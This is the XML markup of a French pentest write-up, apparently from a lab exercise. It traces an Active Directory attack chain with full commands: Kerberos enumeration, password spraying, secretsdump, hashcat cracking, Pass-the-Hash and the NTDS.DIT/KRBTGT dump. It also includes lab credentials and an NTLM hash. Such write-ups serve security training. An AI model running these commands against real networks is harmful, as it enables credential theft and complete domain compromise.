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L</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>a méthodologie complète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Énumération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Compromission initiale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Mouvement latéral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Élévation de privilèges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Compromission du domaine</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="start"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Exemple 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Énumération réseau + LDAP + Kerberos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Compromission d’</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>un compte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Reconnaissance AD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Mouvement latéral : Pass-the-Hash, SecretsDump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Élévation : Kerberoasting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Compromission finale : NTDS</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="start"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>. Vulnérabilités AD pertinentes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SMB signing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Kerberoasting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Password spraying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Description LDAP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NTLM relay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LAPS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NTDS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SPN</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="start"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>. Outils + commandes + résultats</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="start"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>4</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>. Capacité à expliquer la méthodologie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Découverte réseau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 xml:space="preserve">→ </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Textesource"/>
        </w:rPr>
        <w:t>Kerberos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 xml:space="preserve">→ </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Textesource"/>
        </w:rPr>
        <w:t>premier compte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 xml:space="preserve">→ </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Textesource"/>
        </w:rPr>
        <w:t>Bloodhound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 xml:space="preserve">→ </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Textesource"/>
        </w:rPr>
        <w:t>Password spray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 xml:space="preserve">→ </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Textesource"/>
        </w:rPr>
        <w:t>SMB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 xml:space="preserve">→ </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Textesource"/>
        </w:rPr>
        <w:t>PTH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 xml:space="preserve">→ </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Textesource"/>
        </w:rPr>
        <w:t>Kerberoast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→ </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Textesource"/>
        </w:rPr>
        <w:t>Domain Admin</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="start"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Chaque étape découle de la précédente.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95"/>
        <w:gridCol w:w="7143"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:tblHeader w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2495" w:type="dxa"/>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Titredetableau"/>
              <w:suppressLineNumbers/>
              <w:bidi w:val="0"/>
              <w:jc w:val="center"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr/>
              <w:t>Élément</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7143" w:type="dxa"/>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Titredetableau"/>
              <w:bidi w:val="0"/>
              <w:jc w:val="end"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr/>
              <w:t xml:space="preserve">Rapport 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Structure méthodologique</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7143" w:type="dxa"/>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Contenudetableau"/>
              <w:bidi w:val="0"/>
              <w:jc w:val="end"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr/>
              <w:t>Très progressive (kill chain réaliste)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Découverte réseau</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7143" w:type="dxa"/>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Contenudetableau"/>
              <w:bidi w:val="0"/>
              <w:jc w:val="end"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr/>
              <w:t>Nmap avec ACK/SYN ciblés AD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Scan services</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7143" w:type="dxa"/>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Contenudetableau"/>
              <w:bidi w:val="0"/>
              <w:jc w:val="end"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Textesource"/>
              </w:rPr>
              <w:t>-sV -sC -p-</w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t xml:space="preserve"> avec analyse AD poussée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LDAP anonyme</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7143" w:type="dxa"/>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Contenudetableau"/>
              <w:bidi w:val="0"/>
              <w:jc w:val="end"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr/>
              <w:t>Testé explicitement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Énumération Kerberos</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7143" w:type="dxa"/>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Contenudetableau"/>
              <w:bidi w:val="0"/>
              <w:jc w:val="end"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr/>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Textesource"/>
              </w:rPr>
              <w:t>krb5-enum-users</w:t>
            </w:r>
            <w:r>
              <w:rPr/>
              <w:t>, AS-REP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BloodHound</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7143" w:type="dxa"/>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Contenudetableau"/>
              <w:bidi w:val="0"/>
              <w:jc w:val="end"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr/>
              <w:t>Utilisé réellement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Password spraying</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7143" w:type="dxa"/>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Contenudetableau"/>
              <w:bidi w:val="0"/>
              <w:jc w:val="end"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr/>
              <w:t>Utilisation méthodique NetExec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Mouvement latéral</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7143" w:type="dxa"/>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Contenudetableau"/>
              <w:bidi w:val="0"/>
              <w:jc w:val="end"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr/>
              <w:t>SecretsDump + Pass-the-Hash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Escalade</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7143" w:type="dxa"/>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Contenudetableau"/>
              <w:bidi w:val="0"/>
              <w:jc w:val="end"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr/>
              <w:t>Kerberoasting + hash NTLM + DCC2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Contenudetableau"/>
              <w:widowControl w:val="false"/>
              <w:suppressLineNumbers/>
              <w:bidi w:val="0"/>
              <w:jc w:val="start"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr/>
              <w:t>Fin de chaîne</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7143" w:type="dxa"/>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Contenudetableau"/>
              <w:bidi w:val="0"/>
              <w:jc w:val="end"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr/>
              <w:t>NTDS.DIT + KRBTGT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Chaîne d'attaque :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Nmap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↓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Kerberos enum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↓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 xml:space="preserve">compte utilisateur </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Textesource"/>
        </w:rPr>
        <w:t>test:test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↓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BloodHound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↓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LDAP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↓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Password Spray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↓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SMB Shares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↓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SecretsDump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↓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Pass-the-Hash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↓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Kerberoasting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↓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Domain Admin</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Texteprformat"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="start"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Textesource"/>
        </w:rPr>
        <w:t>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NTDS</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Texteprformat"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="283"/>
        <w:jc w:val="start"/>
        <w:rPr>
          <w:rStyle w:val="Textesource"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr/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Nmap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SMB / LDAP / Kerberos enum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Password Guessing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BloodHound + LDAP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Password Spray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SMB Shares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SecretsDump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Pass-the-Hash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Kerberoasting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Password Spray final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Domain Admin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NTDS.DIT</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Texteprformat"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="283"/>
        <w:jc w:val="start"/>
        <w:rPr>
          <w:rStyle w:val="Textesource"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Texteprformat"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="283"/>
        <w:jc w:val="start"/>
        <w:rPr>
          <w:rStyle w:val="Textesource"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr/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  <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>Exemple :</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Texteprformat"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="283"/>
        <w:jc w:val="start"/>
        <w:rPr>
          <w:rStyle w:val="Textesource"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr/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Textesource"/>
          <w:rFonts w:eastAsia="NSimSun" w:cs="Liberation Mono" w:ascii="Liberation Mono" w:hAnsi="Liberation Mono"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Résumé de la méthodologie utilisée dans </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Textesource"/>
          <w:rFonts w:eastAsia="NSimSun" w:cs="Liberation Mono" w:ascii="Liberation Mono" w:hAnsi="Liberation Mono"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>un</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Textesource"/>
          <w:rFonts w:eastAsia="NSimSun" w:cs="Liberation Mono" w:ascii="Liberation Mono" w:hAnsi="Liberation Mono"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> pentest Active Directory avec les principales commandes associées : Le scénario suit une progression réaliste d'attaquant interne : découverte → accès initial → reconnaissance → mouvement latéral → compromission du domaine.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3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1. Énumération réseau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Objectif : identifier les hôtes actifs et les services exposés.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Style w:val="Strong"/>
          <w:rFonts w:eastAsia="NSimSun" w:cs="Liberation Mono" w:ascii="Liberation Mono" w:hAnsi="Liberation Mono"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Découverte des machines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nmap -sn -PA445,139,135,389 -PS445,139,135,389 10.250.0.0/24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Style w:val="Strong"/>
          <w:rFonts w:eastAsia="NSimSun" w:cs="Liberation Mono" w:ascii="Liberation Mono" w:hAnsi="Liberation Mono"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Scan complet des services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nmap -Pn -sV -sC -p- -T4 10.250.0.101 10.250.0.112 10.250.0.117 --open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Identification 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Contrôleur de domaine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Serveur de fichiers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Poste client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Services SMB, LDAP, Kerberos, WinRM, RDP...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Configuration DNS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sudo nano /etc/resolv.conf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nameserver 10.250.0.101</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Lignehorizontale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Heading3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2. Tentatives d'énumération anonyme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Objectif : récupérer des informations sans compte.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SMB Null Session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enum4linux -a 10.250.0.101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LDAP anonyme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ldapsearch -x -H ldap://10.250.0.101 -b "DC=travers,DC=ic"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Échec sur les deux méthodes.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Lignehorizontale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Heading3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3. Énumération Kerberos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Objectif : découvrir des utilisateurs valides sans authentification.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Recherche d'utilisateurs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nmap -p 88 --script krb5-enum-users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--script-args krb5-enum-users.realm='travers.ic',userdb=/tmp/users.txt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10.250.0.101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Recherche AS-REP Roasting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  <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>impacket-GetNPUsers</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Textesource"/>
        </w:rPr>
        <w:t xml:space="preserve"> travers.ic/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-no-pass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-usersfile users.txt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-dc-ip 10.250.0.101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Comptes découverts : administrator, test, backup.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Lignehorizontale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Heading3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Compromission du premier compte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Objectif : obtenir un premier accès.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b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="NSimSun" w:cs="Liberation Mono" w:ascii="Liberation Mono" w:hAnsi="Liberation Mono"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Password guessing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  <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>nxc smb</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Textesource"/>
        </w:rPr>
        <w:t xml:space="preserve"> 10.250.0.101 -u test -p test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Compte compromis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test:test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Premier accès authentifié obtenu.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Lignehorizontale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Heading3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Reconnaissance Active Directory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Objectif : cartographier l'environnement et trouver des faiblesses.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Collecte BloodHound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  <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>bloodhound-python</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Textesource"/>
        </w:rPr>
        <w:t xml:space="preserve">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-u test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-p test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-d travers.ic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-ns 10.250.0.101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-c all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Recherche LDAP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  <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>ldapsearch</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Textesource"/>
        </w:rPr>
        <w:t xml:space="preserve">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-x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-H ldap://10.250.0.101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-D "test@travers.ic"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-w test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-b "DC=travers,DC=ic"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"(&amp;(objectClass=user)(description=*))"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Découverte d'un mot de passe dans une description LDAP.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Politique de mot de passe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  <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>nxc smb</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Textesource"/>
        </w:rPr>
        <w:t xml:space="preserve"> 10.250.0.101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-u test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-p test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-d travers.ic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--pass-pol</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Lignehorizontale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Heading3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Password spraying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Objectif : tester la réutilisation des mots de passe.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Validation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  <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>nxc smb</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Textesource"/>
        </w:rPr>
        <w:t xml:space="preserve"> 10.250.0.101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-u amaillot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-p SupportTraversic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Spray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  <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">nxc smb </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Textesource"/>
        </w:rPr>
        <w:t>10.250.0.101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-u allusers.txt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-p SupportTraversic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--continue-on-success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Plusieurs comptes compromis.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Lignehorizontale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Heading3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7. Énumération SMB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Objectif : chercher des fichiers sensibles.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Partages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  <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">nxc smb </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Textesource"/>
        </w:rPr>
        <w:t>10.250.0.112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-u amaillot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-p SupportTraversic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  <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>--shares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Exploration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smbclient //10.250.0.112/data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-U amaillot%SupportTraversic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Découverte d'identifiants dans un script PowerShell.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Lignehorizontale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Heading3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Mouvement latéral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Objectif : étendre l'accès.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Extraction de secrets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  <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>impacket-secretsdump</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Textesource"/>
        </w:rPr>
        <w:t xml:space="preserve">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travers.ic/pbegue:'SupportTraversic'@10.250.0.117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Crack DCC2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  <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>hashcat</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Textesource"/>
        </w:rPr>
        <w:t xml:space="preserve"> -m 2100 hash.txt rockyou.txt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Pass-the-Hash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  <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>nxc smb</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Textesource"/>
        </w:rPr>
        <w:t xml:space="preserve"> 10.250.0.112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-u Administrator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-H d44b8cdb2eedffce8a3fbc78e081e274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--local-auth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Le même hash admin local fonctionne ailleurs (absence de LAPS).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Lignehorizontale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Heading3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Kerberoasting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Objectif : extraire des tickets Kerberos puis casser les mots de passe hors ligne.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Récupération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  <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>impacket-GetUserSPNs</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Textesource"/>
        </w:rPr>
        <w:t xml:space="preserve">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travers.ic/scolin:'M3dic3xP4ssw0rd'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-dc-ip 10.250.0.101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  <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>-request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-outputfile kerberoast.txt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Crack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hashcat -m 13100 kerberoast.txt rockyou.txt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Deux mots de passe trouvés.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Lignehorizontale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Heading3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Compromission finale du domaine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Objectif : obtenir Domain Admin.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Password spraying final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  <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">nxc smb </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Textesource"/>
        </w:rPr>
        <w:t>10.250.0.101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-u users.txt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-p passwords.txt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--continue-on-success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Compromission du compte administrateur.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Extraction complète AD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  <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>impacket-secretsdump</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Textesource"/>
        </w:rPr>
        <w:t xml:space="preserve"> \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travers.ic/administrator:'P4ssw0rd'@10.250.0.101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Récupération NTDS.DIT + hash KRBTGT → contrôle complet du domaine.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Schéma synthétique :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Nmap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SMB / LDAP / Kerberos enum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Password Guessing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BloodHound + LDAP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Password Spray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SMB Shares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SecretsDump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Pass-the-Hash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Kerberoasting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Password Spray final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Domain Admin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 xml:space="preserve"> ↓</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Texteprformat"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="283"/>
        <w:jc w:val="start"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Textesource"/>
        </w:rPr>
        <w:t>NTDS.DIT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Cette chaîne suit une logique typique de pentest interne Active Directory : accès initial faible → abus de mauvaises pratiques → escalade progressive jusqu'au contrôle total du domaine.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Texteprformat"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="283"/>
        <w:jc w:val="start"/>
        <w:rPr>
          <w:rStyle w:val="Textesource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character" w:styleId="Caractresdenumrotation">
    <w:name w:val="Caractères de numérotation"/>
    <w:qFormat/>
    <w:rPr/>
  </w:style>
  <w:style w:type="character" w:styleId="Strong">
    <w:name w:val="Strong"/>
    <w:qFormat/>
    <w:rPr>
      <w:b/>
      <w:b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LibreOffice/26.2.2.2$Windows_X86_64 LibreOffice_project/1f77d10d6938fd34972958f64b2bcfa54f8b1ba5</Application>
  <AppVersion>15.0000</AppVersion>
  <Pages>9</Pages>
  <Words>806</Words>
  <Characters>4837</Characters>
  <CharactersWithSpaces>5383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2026-06-02T14:45:19Z</dcterms:created>
  <dc:creator/>
  <dc:description/>
  <dc:language>fr-FR</dc:language>
  <cp:lastModifiedBy/>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-06-02T15:08:43Z</dcterms:modified>
  <cp:revision>1</cp:revision>
  <dc:subject/>
  <dc:title/>
</cp:coreProperties>
</file>